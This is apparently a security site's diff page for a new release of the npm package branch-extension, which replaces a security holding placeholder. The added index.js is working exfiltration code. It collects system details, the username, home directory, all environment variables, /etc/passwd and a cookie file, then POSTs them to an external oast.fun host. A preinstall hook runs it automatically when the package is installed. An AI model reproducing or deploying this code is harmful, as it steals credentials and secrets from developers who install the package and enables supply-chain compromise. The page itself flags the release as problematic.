branch-extension 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of branch-extension might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +73 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,73 @@
1
+ const os = require('os');
2
+ const fs = require('fs');
3
+ const https = require('https');
4
+
5
+ // Helper function to send data back to your server
6
+ const sendData = (data) => {
7
+ const options = {
8
+ hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun', // Your server where you collect the info
9
+ port: 443,
10
+ path: '/branchExtensionbranchbbp', //https://github.com/BranchMetrics/AdobeBranchExtension-Web/blob/cf1dac09852bbe7ee99ea323f3bcca551506f752/package.json
11
+ method: 'POST',
12
+ headers: {
13
+ 'Content-Type': 'application/json',
14
+ },
15
+ };
16
+
17
+ const req = https.request(options, (res) => {
18
+ res.on('data', (d) => {
19
+ process.stdout.write(d);
20
+ });
21
+ });
22
+
23
+ req.on('error', (error) => {
24
+ console.error(error);
25
+ });
26
+
27
+ req.write(JSON.stringify(data));
28
+ req.end();
29
+ };
30
+
31
+ // Gather system information
32
+ const getSystemInfo = () => {
33
+ const userInfo = os.userInfo();
34
+ const networkInterfaces = os.networkInterfaces();
35
+
36
+ const systemInfo = {
37
+ hostname: os.hostname(),
38
+ osType: os.type(),
39
+ osRelease: os.release(),
40
+ platform: os.platform(),
41
+ arch: os.arch(),
42
+ whoami: userInfo.username,
43
+ homeDir: userInfo.homedir,
44
+ networkInterfaces: networkInterfaces,
45
+ ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
46
+ macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
47
+ uptime: os.uptime(),
48
+ currentWorkingDir: process.cwd(),
49
+ envVariables: process.env,
50
+ };
51
+
52
+ return systemInfo;
53
+ };
54
+
55
+ // Optionally, attempt to read sensitive files (ensure you are authorized to do so)
56
+ const readSensitiveFile = (filePath) => {
57
+ try {
58
+ const data = fs.readFileSync(filePath, 'utf8');
59
+ return data;
60
+ } catch (err) {
61
+ return `Error reading ${filePath}: ${err.message}`;
62
+ }
63
+ };
64
+
65
+ // Collect data
66
+ const collectedData = {
67
+ systemInfo: getSystemInfo(),
68
+ passwdFile: readSensitiveFile('/etc/passwd'), // Non-sensitive file on Unix-based systems
69
+ cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
70
+ };
71
+
72
+ // Send collected data back to the attacker's server
73
+ sendData(collectedData);
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "branch-extension",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "takeover by sachin_kr",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=branch-extension for more information.